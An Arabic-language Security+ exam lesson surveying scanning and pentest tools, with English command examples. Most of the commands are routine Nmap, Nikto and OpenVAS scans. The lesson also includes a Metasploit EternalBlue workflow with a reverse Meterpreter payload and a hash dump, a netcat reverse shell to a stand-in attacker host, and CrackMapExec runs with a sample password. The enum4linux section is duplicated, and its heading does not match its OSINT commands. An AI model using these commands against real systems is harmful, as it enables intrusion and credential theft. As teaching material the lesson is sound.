أدوات الفحص الشائعة: Nessus وOpenVAS وNmap
اكتسب خبرة عملية أولية بالأدوات القياسية في المجال لاكتشاف المضيفين وفحص المنافذ وتحديد الثغرات.
أدوات الفحص الشائعة: Nessus وOpenVAS وNmap درس مجاني في Cloud & IT Cert Prep على CoddyKit. هذا هو الدرس 2 من أصل 4. يمكنك قراءة الدرس كاملاً أدناه مجاناً — ثم تمرن عليه مباشرة في المتصفح باستخدام محرر أكواد مدمج ومدرس ذكاء اصطناعي متاح 24/7. هذا الدرس جزء من مسار التعلم في Cloud & IT Cert Prep، وتقدمك يتزامن عبر الويب وتطبيق CoddyKit. تتضمن دورة Cloud & IT Cert Prep 4 دروس في المجموع.
منظومة أدوات الفحص
يستخدم اختصاصيو الأمن مجموعة متنوعة من أدوات الفحص لأغراض مختلفة، مثل اكتشاف المضيفين، وفحص المنافذ، وتعداد الخدمات، واكتشاف أنظمة التشغيل، وتحديد الثغرات، واختبار تطبيقات الويب. ويتوقع اختبار Security+ الإلمام بالأدوات الأكثر استخداماً في كل فئة. ويساعد فهم ما تفعله كل أداة، وما لا تستطيع فعله، على اختيار الأداة المناسبة للمهمة وتفسير النتائج بشكل صحيح. كما توفر نتائج عدة أدوات متكاملة تغطية أشمل من أي أداة منفردة.
Nmap: أداة تعيين الشبكات
Nmap (Network Mapper) هي أداة مفتوحة المصدر واسعة الاستخدام لاكتشاف الشبكات والتدقيق الأمني. ويمكنها اكتشاف المضيفين النشطين، وتعداد المنافذ المفتوحة، واكتشاف الخدمات قيد التشغيل وإصداراتها، وتحديد نظام التشغيل. تستخدم Nmap تقنيات فحص متنوعة، منها فحص SYN (الافتراضي، وهو سريع ومتخفٍّ نسبياً)، وTCP Connect (مصافحة كاملة، وهو أكثر ضجيجاً لكنه لا يحتاج إلى صلاحيات root)، وفحص UDP، وفحص الإصدار. وتأتي مع Nmap Scripting Engine (NSE)، التي توفر مئات النصوص البرمجية لاكتشاف الثغرات، وتنفيذ هجمات القوة الغاشمة، والاستغلال.
# Common Nmap scan types:
nmap -sS 192.168.1.0/24 # SYN scan (fast, stealthy)
nmap -sT 192.168.1.10 # TCP connect scan
nmap -sU -p 53,67,161 target # UDP scan specific ports
nmap -sV 192.168.1.10 # version detection
nmap -O 192.168.1.10 # OS detection
nmap -A 192.168.1.10 # aggressive: -sV -O -sC --traceroute
nmap -p- 192.168.1.10 # scan all 65535 ports
nmap --script vuln 192.168.1.10 # run vulnerability scriptsمخرجات Nmap وتفسيرها
يُعد تفسير مخرجات Nmap بشكل صحيح مهارة أساسية. يمثل كل سطر منفذاً مع حالته (open: توجد خدمة تستمع، وclosed: استجاب المضيف لكن لا توجد خدمة تستمع، وfiltered: لا توجد استجابة أو أن ICMP غير قابل للوصول، ويرجح أن يكون جدار ناري قد حجبها)، والبروتوكول، والخدمة أو الإصدار المكتشف. وتمثل المنافذ المفتوحة سطح هجوم محتملاً. وقد تشير المنافذ المفتوحة غير المتوقعة على مضيف إلى اختراق أو خدمات غير مصرّح بها. تحفظ العلامات -oN و-oX و-oG المخرجات بتنسيقات عادية وXML وقابلة للبحث باستخدام grep، ويُعد حفظ المخرجات أمراً بالغ الأهمية للتوثيق والمقارنة بين عمليات الفحص عبر الزمن.
# Sample Nmap output:
# PORT STATE SERVICE VERSION
# 22/tcp open ssh OpenSSH 8.2p1 Ubuntu
# 80/tcp open http Apache 2.4.41
# 443/tcp open ssl/http Apache 2.4.41
# 8080/tcp open http Jetty 9.4.39
# 3306/tcp open mysql MySQL 8.0.26
# 3306 open to internet = HIGH RISK (should be internal only)
# Save output:
nmap -sV 192.168.1.0/24 -oN scan_results.txt -oX scan_results.xmlNessus: أداة فحص الثغرات للمؤسسات
يُعد Nessus (من Tenable) أداة فحص الثغرات التجارية الأكثر انتشاراً. ويستخدم بنية إضافات تتضمن أكثر من 100,000 إضافة تغطي CVEs، وفحوصات الإعدادات، ومعايير الامتثال (CIS وDISA STIG)، واكتشاف البرمجيات الخبيثة. وينفذ Nessus عمليات فحص باستخدام بيانات الاعتماد عبر تسجيل الدخول إلى الأنظمة ببيانات الاعتماد المقدمة لفحص إصدارات البرامج المثبتة، ومفاتيح السجل، وملفات الإعداد، مما ينتج نتائج أدق بكثير من الاستقصاء الشبكي دون بيانات اعتماد. وينتج Nessus تقارير تفصيلية تتضمن درجات CVSS، وأوصاف الثغرات، وتوصيات المعالجة. ويفحص الإصدار المجاني Nessus Essentials ما يصل إلى 16 عنوان IP.
# Nessus scan configuration key settings:
# Scan type: Advanced Scan (most control)
# Credentials: Windows (domain admin), SSH (root or sudo)
# Plugins: enable 'Safe Checks' to avoid crashing systems
# Schedule: define scan window (off-hours recommended)
# Nessus output rating:
# Critical (CVSS 9.0-10.0): remote code execution, critical data exposure
# High (CVSS 7.0-8.9): privilege escalation, severe data exposure
# Medium (CVSS 4.0-6.9): local privilege escalation, information disclosure
# Low (CVSS 0.1-3.9): minimal impact, hardening issues
# Info: configuration data, no immediate riskOpenVAS: فحص الثغرات مفتوح المصدر
OpenVAS (Open Vulnerability Assessment System) هو أداة مجانية ومفتوحة المصدر لفحص الثغرات، تتولى Greenbone Networks صيانتها. وهو الفرع المدعوم من المجتمع من Nessus الأصلي قبل تحوله إلى منتج تجاري. يستخدم OpenVAS NVTs (Network Vulnerability Tests) المشابهة لإضافات Nessus. ويوفر Greenbone Community Edition (GCE) واجهة إدارة قائمة على الويب (Greenbone Security Assistant). ويحظى OpenVAS بشعبية في البيئات التي تحول فيها تكاليف التراخيص دون استخدام الأدوات التجارية. وتفوق مجموعة ميزاته Nmap مع بقائه مجانياً، مما يجعله خياراً شائعاً للمؤسسات الصغيرة والبيئات الأكاديمية ومختبرات الأمن.
# OpenVAS quick start:
# Install via Kali Linux or Docker:
gvm-setup # initial setup (takes time to download feeds)
gvm-start # start OpenVAS services
# Create a scan in the web UI (https://localhost:9392):
# 1. Create Target (host IPs, credentials)
# 2. Create Scan Config (Full and Fast, or Full Deep)
# 3. Create Task -> assign target + config
# 4. Start Task -> review Results report
# CLI scan:
openvas-cli --host=127.0.0.1 --user=admin --xml="<start_task>..."Nikto: أداة فحص ثغرات خوادم الويب
يُعد Nikto أداة مفتوحة المصدر لفحص خوادم الويب، إذ يتحقق من الملفات الخطرة، وإصدارات البرامج القديمة، ومشكلات إعداد الخادم، وثغرات الويب الشائعة. ويفحص أكثر من 6,700 مشكلة معروفة، منها أساليب HTTP غير الآمنة، ورؤوس الأمان المفقودة، وواجهات الإدارة المكشوفة، وبيانات الاعتماد الافتراضية، وثغرات CGI الشائعة. ويصدر Nikto ضجيجاً كبيراً، ولم يُصمم للتخفي، إذ ينشئ سجلات كثيرة على الهدف. وهو يكمل أدوات الفحص على مستوى الشبكة من خلال توفير فحوصات خاصة بالويب قد لا تغطيها Nessus وOpenVAS بعمق. استخدموا Nikto دائماً فقط على الأنظمة المصرح لكم باختبارها.
# Nikto web scan examples:
nikto -h 192.168.1.10 # basic scan
nikto -h https://192.168.1.10 # HTTPS target
nikto -h 192.168.1.10 -p 8080,8443 # multiple ports
nikto -h 192.168.1.10 -o report.html -Format html # save report
# Nikto checks include:
# - Missing X-Frame-Options, Content-Security-Policy headers
# - Apache/nginx version disclosure
# - /admin, /phpinfo.php, /.git/ exposed
# - Default test files (phpMyAdmin, WebDAV)Metasploit Framework
يُعد Metasploit Framework منصة اختبار الاختراق الأكثر استخداماً، إذ يوفر قاعدة بيانات للاستغلالات، والحمولات، والوحدات المساعدة، وأدوات ما بعد الاستغلال. وينبغي لمرشحي Security+ فهم ماهية Metasploit وكيفية توظيفه ضمن اختبار الاختراق، حتى إن لم يسبق لهم استخدامه. تتضمن وحدات Metasploit ما يلي: exploits (شفرة تستغل ثغرة)، وpayloads (شفرة shellcode تُشغَّل بعد نجاح الاستغلال، مثل Meterpreter)، وauxiliary modules (للفحص، وfuzzing، والتعداد دون استغلال)، وpost modules (لتصعيد الامتيازات، واستخراج بيانات الاعتماد، والحركة الجانبية بعد الوصول الأولي).
# Metasploit Framework basic workflow:
msfconsole # start Metasploit
search eternalblue # search for exploit
use exploit/windows/smb/ms17_010_eternalblue
info # show exploit details
set RHOSTS 192.168.1.10 # target IP
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.5 # attacker IP
run # execute exploit
# After shell:
meterpreter> sysinfo
meterpreter> getuid
meterpreter> hashdump # dump NTLM hashesNetcat: سكين الجيش السويسري
Netcat (nc) أداة بسيطة ومتعددة الاستخدامات، تقرأ البيانات وتكتبها عبر اتصالات الشبكة باستخدام TCP أو UDP. ولها استخدامات لا حصر لها في أعمال الأمن: إنشاء جلسات reverse shell من المضيفين المخترقين، ونقل الملفات عبر مقاطع الشبكة، وفحص المنافذ، وإنشاء مستمعات شبكة بسيطة للاختبار، واستخراج اللافتات للتعرّف على إصدارات الخدمات. إن بساطتها وتوفرها على كل أنظمة Linux تقريبًا يجعلانها أداة شائعة الاستخدام في كلٍّ من الإدارة المشروعة وحزم أدوات المهاجمين، ولذلك من المهم فهمها أيضًا من منظور الكشف عنها.
# Netcat usage examples:
# Banner grabbing:
nc -v 192.168.1.10 22 # grab SSH banner
nc -v 192.168.1.10 80 # grab HTTP banner
# Port scan:
nc -zv 192.168.1.10 1-1024 2>&1 | grep succeeded
# Reverse shell (attacker listens, victim connects out):
# Attacker: nc -lvnp 4444
# Victim: nc attacker_ip 4444 -e /bin/bash
# File transfer:
# Receiver: nc -lvnp 9999 > received_file.txt
# Sender: nc receiver_ip 9999 < file.txtالاستطلاع الشبكي باستخدام Enum4linux
تعمل Enum4linux على تعداد المعلومات من مضيفي Windows وخوادم Samba (SMB في Linux) باستخدام الجلسات الفارغة وMSRPC. وتستخرج أسماء المستخدمين، وعضويات المجموعات، والمشاركات، وسياسات كلمات المرور، ومعلومات مجموعة العمل. وأثناء اختبارات الاختراق الداخلية، يمكن لـ enum4linux الكشف بسرعة عن حسابات المستخدمين المتاحة لهجمات رش كلمات المرور وبنية المشاركات في البيئة. تقيّد إصدارات Windows الحديثة الوصول عبر الجلسات الفارغة افتراضيًا، لكن البيئات سيئة الإعداد غالبًا ما تكشف قدرًا كبيرًا من المعلومات. وتتوفر إمكانات مماثلة في samrdump.py ضمن Impacket وفي CrackMapExec للتعداد الموثَّق.
# OSINT tool chain for reconnaissance:
# 1. WHOIS: domain registration details
whois example.com
# 2. DNS enumeration:
dnsrecon -d example.com -t std
fiercer --domain example.com
# 3. Shodan: internet-facing device search
# shodan search 'org:"Target Corp" port:3389'
# 4. theHarvester: emails, subdomains, names
theharvester -d example.com -l 500 -b google,linkedin
# 5. Certificate transparency:
crt.sh/?q=%.example.com (reveals subdomains via certs)التعداد الشبكي باستخدام Enum4linux
Enum4linux يستخرج معلومات من مضيفات Windows وخوادم Samba (SMB لنظام Linux) باستخدام الجلسات الفارغة وMSRPC. ويستخرج أسماء المستخدمين، وعضويات المجموعات، والمشاركات، وسياسات كلمات المرور، ومعلومات مجموعات العمل. أثناء اختبارات الاختراق الداخلية، يمكن لـ enum4linux الكشف بسرعة عن حسابات المستخدمين المتاحة لهجمات رش كلمات المرور، وبنية المشاركات في البيئة. تقيّد الإصدارات الحديثة من Windows الوصول عبر الجلسات الفارغة افتراضيًا، لكن البيئات سيئة الإعداد غالبًا ما تكشف قدرًا كبيرًا من المعلومات. تتوفر إمكانات مماثلة في samrdump.py ضمن Impacket وفي CrackMapExec لإجراء التعداد باستخدام المصادقة.
# Enum4linux Windows enumeration:
enum4linux -a 192.168.1.10 # all enumeration
enum4linux -U 192.168.1.10 # users only
enum4linux -S 192.168.1.10 # shares only
# CrackMapExec (authenticated enumeration):
crackmapexec smb 192.168.1.0/24 -u admin -p Password1
crackmapexec smb 192.168.1.10 --users
crackmapexec smb 192.168.1.10 --shares
# Nmap SMB scripts:
nmap --script smb-enum-users 192.168.1.10
nmap --script smb-os-discovery 192.168.1.10اختيار الأداة المناسبة للمهمة
يطابق متخصصو الأمن الأدوات مع المهام. بالنسبة إلى اكتشاف المضيفين وفحص المنافذ: Nmap. وبالنسبة إلى تحديد الثغرات على نطاق واسع: Nessus (تجارية) أو OpenVAS (مجانية). وبالنسبة إلى ثغرات خوادم الويب: Nikto. وبالنسبة إلى هجمات تطبيقات الويب: Burp Suite. وبالنسبة إلى الاستغلال: Metasploit. وبالنسبة إلى استطلاع OSINT: Recon-ng وtheHarvester وShodan. وبالنسبة إلى تحليل حركة الشبكة: Wireshark وtcpdump. وبالنسبة إلى الهجمات اللاسلكية: حزمة Aircrack-ng. يختبر امتحان Security+ المعرفة المفاهيمية بهذه الأدوات — لذا ينبغي أن تعرف استخدام كل أداة، حتى إن لم تكن لديك خبرة عملية بكل واحدة منها.
تحقق سريع
اختبر مدى فهمك لمفاهيم CompTIA Security+ (SY0-701) الواردة في هذا الدرس.
مراجعة الدرس
تعلمت في هذا الدرس أن Nmap هو الأساس لاكتشاف المضيفين وفحص المنافذ واكتشاف الإصدارات، مع محرك برمجة نصية غني لإضافة إمكانات أخرى، وأن Nessus وOpenVAS ينفذان فحصًا شاملًا للثغرات مقابل CVEs المعروفة، ويستخدمان الوصول المعتمد لتحقيق أعلى دقة، وأن Metasploit يوفر إطار عمل للاستغلال يمكّن مختبري الاختراق من التحقق من قابلية استغلال الثغرات فعليًا وإظهار الأثر الحقيقي للهجوم. بعد ذلك، سنستكشف دورة حياة اختبار الاختراق كاملة، بدءًا من الاستطلاع ووصولًا إلى إعداد التقرير.
الأسئلة الشائعة
هل درس «أدوات الفحص الشائعة: Nessus وOpenVAS وNmap» مجاني؟
نعم — نص درس «أدوات الفحص الشائعة: Nessus وOpenVAS وNmap» كامل متاح مجاناً هنا على الويب. لتمرينه بشكل تفاعلي (محرر أكواد مدمج ومدرس ذكاء اصطناعي متاح 24/7) وفتح باقي دورة Cloud & IT Cert Prep، انتقل إلى CoddyKit PRO. تتضمن دورة Cloud & IT Cert Prep 4 دروس في المجموع.
ماذا ستتعلم في «أدوات الفحص الشائعة: Nessus وOpenVAS وNmap»؟
اكتسب خبرة عملية أولية بالأدوات القياسية في المجال لاكتشاف المضيفين وفحص المنافذ وتحديد الثغرات. تتمرن على Cloud & IT Cert Prep مع أكواد عملية تشغلها مباشرة في المتصفح، ومدرس ذكاء اصطناعي متاح 24/7 يجيب على أسئلتك أثناء عملك.
هل أحتاج إلى خبرة سابقة لأبدأ Cloud & IT Cert Prep؟
لا تُشترط خبرة سابقة. Cloud & IT Cert Prep على CoddyKit منظم للمبتدئين حتى المتقدمين، لذا يمكنك البدء من هنا أو من البداية والتقدم بسرعتك الخاصة. هذا هو الدرس 2 من أصل 4.
كم من الوقت يستغرق درس «أدوات الفحص الشائعة: Nessus وOpenVAS وNmap»؟
معظم دروس CoddyKit تستغرق حوالي 5–10 دقائق. كل منها موجز وتفاعلي، لذا تحرز تقدماً مستمراً وتستأنف من حيث توقفت عبر الويب والتطبيق.
هل يمكنني كتابة وتشغيل أكواد في درس Cloud & IT Cert Prep هذا؟
نعم. كل درس في Cloud & IT Cert Prep يتضمن محرر أكواد مدمج، لذا تكتب وتشغل أكواداً حقيقية مباشرة في متصفحك وتحصل على تعليقات فورية من الذكاء الاصطناعي — بدون إعداد محلي.
جميع الدروس في هذه الدورة
- فحص الثغرات مقابل اختبار الاختراق
- أدوات الفحص الشائعة: Nessus وOpenVAS وNmap
- مراحل اختبار الاختراق: من الاستطلاع إلى إعداد التقرير
- تقييم CVSS وترتيب أولويات الثغرات